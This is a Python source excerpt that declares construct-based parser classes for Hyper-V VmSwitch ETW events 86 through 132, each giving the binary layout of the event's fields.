@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=86, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_86_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=87, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_87_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=88, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_88_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"AllowMacSpoofing" / Int8ul,
"EnableDhcpGuard" / Int8ul,
"EnableRouterGuard" / Int8ul,
"MonitorMode" / Int32ul,
"MonitorSession" / Int32ul,
"AllowIeeePriorityTag" / Int8ul,
"VirtualSubnetId" / Int32ul,
"AllowTeaming" / Int8ul,
"StormLimit" / Int32ul,
"DynamicIPAddressLimit" / Int32ul,
"EnableFixSpeed10G" / Int8ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=89, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_89_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"AllowMacSpoofing" / Int8ul,
"EnableDhcpGuard" / Int8ul,
"EnableRouterGuard" / Int8ul,
"MonitorMode" / Int32ul,
"MonitorSession" / Int32ul,
"AllowIeeePriorityTag" / Int8ul,
"VirtualSubnetId" / Int32ul,
"AllowTeaming" / Int8ul,
"StormLimit" / Int32ul,
"DynamicIPAddressLimit" / Int32ul,
"EnableFixSpeed10G" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=90, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_90_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Applicability" / Int32ul,
"Type" / Int32ul,
"Action" / Int32ul,
"LocalAddrLen" / Int32ul,
"LocalAddr" / Bytes(lambda this: this.LocalAddrLen),
"LocalPrefix" / Int32ul,
"RemoteAddrLen" / Int32ul,
"RemoteAddr" / Bytes(lambda this: this.RemoteAddrLen),
"RemotePrefix" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=91, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_91_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Applicability" / Int32ul,
"Type" / Int32ul,
"Action" / Int32ul,
"LocalAddrLen" / Int32ul,
"LocalAddr" / Bytes(lambda this: this.LocalAddrLen),
"LocalPrefix" / Int32ul,
"RemoteAddrLen" / Int32ul,
"RemoteAddr" / Bytes(lambda this: this.RemoteAddrLen),
"RemotePrefix" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=92, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_92_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=93, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_93_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=94, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_94_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"IPSecOffloadLimit" / Int32ul,
"VMQOffloadWeight" / Int32ul,
"IovOffloadWeight" / Int32ul,
"QueuePairs" / Int32ul,
"InterruptModeration" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=95, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_95_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=96, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_96_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=97, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_97_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=98, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_98_0(Etw):
pattern = Struct(
"ExtensionId" / Guid,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=99, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_99_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=100, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_100_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=101, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_101_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=102, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_102_0(Etw):
pattern = Struct(
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"VMIdLen" / Int32ul,
"VMId" / Bytes(lambda this: this.VMIdLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=103, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_103_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=104, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_104_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=105, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_105_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=106, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_106_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"QueueMode" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=107, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_107_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=108, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_108_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=109, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_109_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SrcNicIndex" / Int32ul,
"DstNicNameLen" / Int32ul,
"DstNicName" / Bytes(lambda this: this.DstNicNameLen),
"DstNicFNameLen" / Int32ul,
"DstNicFName" / Bytes(lambda this: this.DstNicFNameLen),
"DstNicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=110, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_110_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SrcNicIndex" / Int32ul,
"DstNicNameLen" / Int32ul,
"DstNicName" / Bytes(lambda this: this.DstNicNameLen),
"DstNicFNameLen" / Int32ul,
"DstNicFName" / Bytes(lambda this: this.DstNicFNameLen),
"DstNicIndex" / Int32ul,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=111, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_111_0(Etw):
pattern = Struct(
"StatusTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=112, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_112_0(Etw):
pattern = Struct(
"StatusTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SrcNicIndex" / Int32ul,
"DstNicNameLen" / Int32ul,
"DstNicName" / Bytes(lambda this: this.DstNicNameLen),
"DstNicFNameLen" / Int32ul,
"DstNicFName" / Bytes(lambda this: this.DstNicFNameLen),
"DstNicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=113, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_113_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=114, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_114_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=115, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_115_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=116, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_116_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"NicIndex" / Int32ul,
"NetCfgInstanceId" / Guid,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=117, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_117_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"NicIndex" / Int32ul,
"NetCfgInstanceId" / Guid,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=118, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_118_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"ConfigurationType" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=119, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_119_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=120, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_120_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=121, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_121_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=122, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_122_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"QueueMode" / Int32ul,
"Status" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=123, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_123_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"LinkSpeed" / Int64ul,
"VmqSupported" / Int8ul,
"dynamicVmqSupported" / Int8ul,
"QueueMode" / Int32ul,
"EnabledFilterTypes" / Int32ul,
"EnabledQueueTypes" / Int32ul,
"SupportedQueueProperties" / Int32ul,
"SupportedFilterTests" / Int32ul,
"SupportedHeaders" / Int32ul,
"SupportedMacHeaderFields" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=124, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_124_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=125, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_125_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=126, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_126_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=127, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_127_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=128, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_128_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=129, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_129_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"RoutingDomainGuidLen" / Int32ul,
"RoutingDomainGuid" / Bytes(lambda this: this.RoutingDomainGuidLen),
"RoutingDomainNameLen" / Int32ul,
"RoutingDomainName" / Bytes(lambda this: this.RoutingDomainNameLen),
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=130, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_130_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Action" / Int32ul,
"LocalIPAddrLen" / Int32ul,
"LocalIPAddr" / Bytes(lambda this: this.LocalIPAddrLen),
"RemoteIPAddrLen" / Int32ul,
"RemoteIPAddr" / Bytes(lambda this: this.RemoteIPAddrLen),
"LocalPortLen" / Int32ul,
"LocalPort" / Bytes(lambda this: this.LocalPortLen),
"RemotePortLen" / Int32ul,
"RemotePort" / Bytes(lambda this: this.RemotePortLen),
"Protocol" / Int32ul,
"Weight" / Int32ul,
"Stateful" / Int8ul,
"IdleSessionTimeout" / Int32ul,
"VirtualSubnetId" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=131, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_131_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Weight" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=132, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_132_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
